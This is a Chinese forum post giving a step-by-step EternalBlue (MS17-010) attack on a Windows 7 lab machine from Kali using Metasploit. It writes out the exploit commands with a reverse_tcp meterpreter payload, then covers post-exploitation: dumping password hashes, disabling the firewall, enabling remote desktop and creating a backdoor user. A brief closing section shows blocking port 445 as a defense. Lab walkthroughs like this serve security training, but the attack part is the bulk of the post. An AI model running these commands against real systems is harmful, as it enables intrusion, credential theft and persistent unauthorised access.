电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 3323 人浏览分享

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

[复制链接]
3323 0
利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

一、环境配置(两台主机均采用 NAT 桥接模式)

1、Kali 主机的IP配置:

180149cew3x3vd0k30za01.png

2、Windows7 主机的IP配置:

99998.png

3.查看 Win7 主机打开的端口

180150nnlrqfdkba66r5k5.png.thumb.jpg

二、利用 MSF 框架对 Win7 进行永恒之蓝渗透【实战篇】

1、启用 msfconsole 攻击平台

9999.png

2、查找目标主机的漏洞编号

9998.jpg

3、使用永恒之蓝漏洞模块

180151j1c1edrayterrrb1.png.thumb.jpg

4、设置 Payload

9997.jpg

9996.jpg

5、查看 Payload 的设置情况

9993.jpg

6、实施攻击

9992.jpg

实施攻击过程的代码:
  1. msf5 > search ms17_010
  2. msf5 > use exploit/windows/smb/ms17_010_eternalblue
  3. msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
  4. windows/x64/meterpreter/reverse_tcp
  5. msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.100.131
  6. rhost => 192.168.100.131
  7. msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.100.128
  8. lhost => 192.168.100.128
  9. msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 1234
  10. msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
复制代码

7、攻入目标主机

9991.jpg

8、查看目标主机的操作系统信息

9990.png

9、对目标主机的屏幕进行截图

999.jpg

998.jpg

10、查看目标主机所有的用户名和密码 密码显示为 hash 值

997.jpg

11、关闭防火墙

996.jpg

12、关闭 Telnet 服务
  1. net stop TlntSvr
复制代码

992.png

13、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况
(1)方法 1:run getgui -e

991.jpg

(2)方法 2:run post/windows/manage/enable_rdp

990.jpg

899.jpg

14、创建系统用户

run getgui –u test –p 123456

898.png

三、利用 MSF 框架对 Win7 进行永恒之蓝渗透【防御篇】

1、在打开 445 端口的前提下 利用系统自带的防火墙进行规则过滤

1)在 win7 上打开防火墙设置窗口 并启用防火墙

897.jpg

896.jpg

2)没有设置防火墙过滤规则前用 Nmap 对目标主机进行端口扫描

893.png

3)针对445端口设置过滤规则

892.png

891.jpg

890.jpg

69.jpg

68.jpg

67.jpg

66.jpg

4,设置防火墙过滤规则后的端口扫描

65.png

5,目标主机设置针对 445 端口的过滤规则后 kali 再对目标主机实施攻击

64.jpg

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.